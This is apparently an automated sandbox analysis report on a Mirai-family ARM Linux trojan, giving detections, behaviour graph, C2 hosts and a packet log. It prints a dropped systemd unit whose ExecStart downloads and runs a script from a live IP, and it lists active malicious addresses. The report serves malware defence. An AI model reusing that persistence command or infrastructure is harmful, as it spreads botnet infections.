Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5535.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5537.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5539.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5545.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5547.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5556.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5564.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5566.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5608.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5610.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5640.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5643.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5652.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5661.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5666.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5671.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5535.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5537.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5539.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5545.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5547.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5556.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5564.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5566.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5608.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5610.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5640.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5643.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5652.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5661.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5666.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5671.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmpBinary or memory string: ,x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 5796.1.00007fc32c034000.00007fc32c045000.rw-.sdmpBinary or memory string: P/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf$/tmp/vmware-root_727-4290690966X/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi4/tmp/hsperfdata_root
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmpBinary or memory string: /tmp/qemu-open.uRTK8R
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerxM
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: 0!/proc/30/cmdline1/tmp/vmware-root_727-4290690966
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585056 Sample: arm5.elf Startdate: 07/01/2025 Architecture: LINUX Score: 72 43 tcpdown.suo. [malformed] 2->43 45 104.168.33.8, 2601, 50380, 50408 AS-COLOCROSSINGUS United States 2->45 47 3 other IPs or domains 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 9 arm5.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 systemd snapd-env-generator 2->14         started        16 4 other processes 2->16 signatures3 53 Sends malformed DNS queries 43->53 process4 signatures5 59 Sample deletes itself 9->59 18 arm5.elf 9->18         started        process6 process7 20 arm5.elf 18->20         started        23 arm5.elf sh 18->23         started        25 arm5.elf sh 18->25         started        27 arm5.elf 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 arm5.elf 20->29         started        31 arm5.elf 20->31         started        33 arm5.elf 20->33         started        41 40 other processes 20->41 35 sh systemctl 23->35         started        37 sh systemctl 25->37         started        39 arm5.elf 27->39         started        process9
SourceDetectionScannerLabelLink
arm5.elf55%ReversingLabsLinux.Trojan.Mirai
arm5.elf56%VirustotalBrowse
arm5.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.95
truefalse
    high
    tcpdown.su|1
    unknown
    unknownfalse
      unknown
      tcpdown.suo. [malformed]
      unknown
      unknowntrue
        unknown
        tcpdown.su
        unknown
        unknownfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.20.138/auto.sh;arm5.elf, startup_command.service.13.drfalse
            high
            http://154.216.20.138/auto.shstartup_command.service.13.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              107.175.130.16
              unknownUnited States
              36352AS-COLOCROSSINGUSfalse
              104.168.33.8
              unknownUnited States
              36352AS-COLOCROSSINGUSfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              107.175.130.16sh4.elfGet hashmaliciousUnknownBrowse
                powerpc.elfGet hashmaliciousUnknownBrowse
                  arm.elfGet hashmaliciousUnknownBrowse
                    sparc.elfGet hashmaliciousUnknownBrowse
                      m68k.elfGet hashmaliciousUnknownBrowse
                        i686.elfGet hashmaliciousUnknownBrowse
                          i586.elfGet hashmaliciousUnknownBrowse
                            sh4.elfGet hashmaliciousUnknownBrowse
                              powerpc.elfGet hashmaliciousUnknownBrowse
                                i586.elfGet hashmaliciousUnknownBrowse
                                  104.168.33.8mips.elfGet hashmaliciousUnknownBrowse
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                      x86_64.elfGet hashmaliciousUnknownBrowse
                                        powerpc.elfGet hashmaliciousUnknownBrowse
                                          sparc.elfGet hashmaliciousUnknownBrowse
                                            powerpc.elfGet hashmaliciousUnknownBrowse
                                              sparc.elfGet hashmaliciousUnknownBrowse
                                                x86_64.elfGet hashmaliciousUnknownBrowse
                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      tcpdown.sux86_64.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 45.200.149.95
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AS-COLOCROSSINGUSmips.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      x86_64.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      arm.elfGet hashmaliciousUnknownBrowse
                                                      • 23.94.242.130
                                                      sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 23.94.242.130
                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      i686.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      i586.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      AS-COLOCROSSINGUSmips.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      x86_64.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 104.168.33.8
                                                      arm.elfGet hashmaliciousUnknownBrowse
                                                      • 23.94.242.130
                                                      sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 23.94.242.130
                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      i686.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      i586.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.130.16
                                                      No context
                                                      No context
                                                      Process:/tmp/arm5.elf
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):361
                                                      Entropy (8bit):5.16738909970438
                                                      Encrypted:false
                                                      SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXbcCmBNcCm4RcCmO/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXIpiQuj73GLHWrv
                                                      MD5:AF7D62B73266E0B457B114FE91F7E926
                                                      SHA1:11261AEF4573B56B67B32020049C69C7282FC212
                                                      SHA-256:14CB525E5A6B8AAF20C38672F8A9F974A684990888214848818326A739906642
                                                      SHA-512:3926FBB53496C3AAA34CC782BD5C8379E0AB94B11FE4E63BBBFEAC4E2B5057369C94BBE25AC56C3F04363076C91B978F9199FED97C5ED8377A6DC852B01EBFD9
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.
                                                      Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):76
                                                      Entropy (8bit):3.7627880354948586
                                                      Encrypted:false
                                                      SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                      MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                      SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                      SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                      SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                      Process:/tmp/arm5.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):14
                                                      Entropy (8bit):3.521640636343319
                                                      Encrypted:false
                                                      SSDEEP:3:TggLAJ5:Tgg03
                                                      MD5:A737667E3E61E716C83359F35BC141DA
                                                      SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
                                                      SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
                                                      SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:/tmp/arm5.elf.
                                                      File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                      Entropy (8bit):5.814382741411491
                                                      TrID:
                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                      File name:arm5.elf
                                                      File size:83'344 bytes
                                                      MD5:69a1790982af9b8302696a012e9fc07a
                                                      SHA1:1c4f8ae74cd4778624ea58a826dfb3c7dd33979a
                                                      SHA256:1b04a271136e186d32999cd8cb762e51c056620c4482668cd7efdb49cb6d4dbf
                                                      SHA512:b19eba5d4555f0b0f703ae99a3ba8b91ece1bf16acd82d500e993f81abf8eda6c574e31ce0b3183b64a8da6d2a0837d7d0170ccc51fd50add6e7ad4d6ecf78a1
                                                      SSDEEP:1536:ih+1IWRBh2N3+SDY/uFMrZa/a4vNXAVBtF748KtYUngTBY4:ih+ba0dda/aSVAVXF74J+Ta4
                                                      TLSH:F2834A92BD815A13C5D5227BFB6E028D372663A8D3EF3243DD266F20778692B0D77601
                                                      File Content Preview:.ELF...a..........(.........4....D......4. ...(......................8...8...............@...@...@..................Q.td..................................-...L."...\C..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                      ELF header

                                                      Class:ELF32
                                                      Data:2's complement, little endian
                                                      Version:1 (current)
                                                      Machine:ARM
                                                      Version Number:0x1
                                                      Type:EXEC (Executable file)
                                                      OS/ABI:ARM - ABI
                                                      ABI Version:0
                                                      Entry Point Address:0x8190
                                                      Flags:0x2
                                                      ELF Header Size:52
                                                      Program Header Offset:52
                                                      Program Header Size:32
                                                      Number of Program Headers:3
                                                      Section Header Offset:82944
                                                      Section Header Size:40
                                                      Number of Section Headers:10
                                                      Header String Table Index:9
                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                      NULL0x00x00x00x00x0000
                                                      .initPROGBITS0x80940x940x180x00x6AX004
                                                      .textPROGBITS0x80b00xb00x10da80x00x6AX0016
                                                      .finiPROGBITS0x18e580x10e580x140x00x6AX004
                                                      .rodataPROGBITS0x18e6c0x10e6c0x2a6c0x00x2A004
                                                      .ctorsPROGBITS0x240000x140000x80x00x3WA004
                                                      .dtorsPROGBITS0x240080x140080x80x00x3WA004
                                                      .dataPROGBITS0x240140x140140x3ac0x00x3WA004
                                                      .bssNOBITS0x243c00x143c00xe7140x00x3WA004
                                                      .shstrtabSTRTAB0x00x143c00x3e0x00x0001
                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                      LOAD0x00x80000x80000x138d80x138d85.92430x5R E0x8000.init .text .fini .rodata
                                                      LOAD0x140000x240000x240000x3c00xead42.76770x6RW 0x8000.ctors .dtors .data .bss
                                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 7, 2025 01:27:56.100620031 CET503802601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:27:56.105757952 CET260150380104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:27:56.105921030 CET503802601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:27:56.108567953 CET503802601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:27:56.113316059 CET260150380104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:27:56.113357067 CET503802601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:27:56.118159056 CET260150380104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:27:56.658688068 CET260150380104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:27:56.658775091 CET503802601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:27:56.659061909 CET503802601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:01.382090092 CET524387722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.386967897 CET772252438107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.387029886 CET524387722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.390841961 CET524407722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.392115116 CET524387722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.392174959 CET524387722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.395627975 CET772252440107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.395695925 CET524407722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.396855116 CET772252438107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.411919117 CET524407722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.412045002 CET524407722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.416661024 CET772252440107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.439678907 CET772252438107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.459680080 CET772252440107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.685743093 CET524427722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.690558910 CET772252442107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.690612078 CET524427722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.695343018 CET524427722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.695424080 CET524427722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.700244904 CET772252442107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.743688107 CET772252442107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.755120039 CET772252438107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.755198956 CET524387722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:01.769399881 CET772252440107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:01.769462109 CET524407722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.077132940 CET772252442107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.077193975 CET524427722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.485888004 CET524447722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.490808010 CET772252444107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.490916014 CET524447722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.493693113 CET524447722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.493693113 CET524447722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.498461008 CET772252444107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.539712906 CET772252444107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.567574024 CET524467722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.572386980 CET772252446107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.572453976 CET524467722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.582211971 CET524467722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.582329988 CET524467722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.587034941 CET772252446107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.627687931 CET772252446107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.765993118 CET524487722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.770775080 CET772252448107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.770821095 CET524487722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.775391102 CET524487722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.775391102 CET524487722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.780216932 CET772252448107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.823714972 CET772252448107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.874125957 CET772252444107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.874180079 CET524447722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:02.960850000 CET772252446107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:02.960897923 CET524467722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:03.154674053 CET772252448107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:03.154721022 CET524487722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.509596109 CET524507722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.521919012 CET524527722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.666956902 CET772252450107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:07.666975975 CET772252452107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:07.667006016 CET524507722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.667052984 CET524527722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.668369055 CET524507722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.668474913 CET524507722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.668728113 CET524527722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.668728113 CET524527722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:07.673086882 CET772252450107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:07.673464060 CET772252452107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:07.715747118 CET772252452107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:07.715759993 CET772252450107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:08.031955004 CET772252450107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:08.032018900 CET524507722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:08.047702074 CET772252452107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:08.047755957 CET524527722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.608144045 CET524547722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.613045931 CET772252454107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.613107920 CET524547722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.614460945 CET524547722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.614532948 CET524547722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.619251013 CET772252454107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.663681030 CET772252454107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.680284977 CET524567722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.685132980 CET772252456107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.685192108 CET524567722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.687294006 CET524567722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.687391043 CET524567722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:12.692039013 CET772252456107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.735709906 CET772252456107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.992847919 CET772252454107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:12.992918015 CET524547722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:13.083017111 CET772252456107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:13.083070040 CET524567722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.578749895 CET524587722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.581921101 CET524607722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.583579063 CET772252458107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.583642960 CET524587722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.586257935 CET524587722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.586411953 CET524587722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.586767912 CET772252460107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.586826086 CET524607722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.591072083 CET772252458107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.612242937 CET524607722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.612317085 CET524607722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.617031097 CET772252460107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.631680012 CET772252458107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.659681082 CET772252460107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.971406937 CET772252460107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.971482038 CET524607722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:17.976633072 CET772252458107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:17.976696968 CET524587722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:22.625546932 CET524627722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:22.630441904 CET772252462107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:22.630506039 CET524627722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:22.630822897 CET524627722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:22.630899906 CET524627722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:22.635582924 CET772252462107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:22.679672003 CET772252462107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:22.825553894 CET504082601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:22.830370903 CET260150408104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:22.830418110 CET504082601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:22.831427097 CET504082601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:22.836240053 CET260150408104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:22.836289883 CET504082601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:22.841129065 CET260150408104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:23.009857893 CET772252462107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:23.009907961 CET524627722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:23.396008015 CET260150408104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:23.396064997 CET504082601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:23.396094084 CET504082601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:27.681282997 CET524667722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:27.686155081 CET772252466107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:27.686219931 CET524667722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:27.686578989 CET524667722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:27.686645031 CET524667722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:27.691359043 CET772252466107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:27.731683969 CET772252466107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:28.059456110 CET772252466107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:28.059514046 CET524667722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:28.206357002 CET524687722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:28.215209007 CET772252468107.175.130.16192.168.2.13
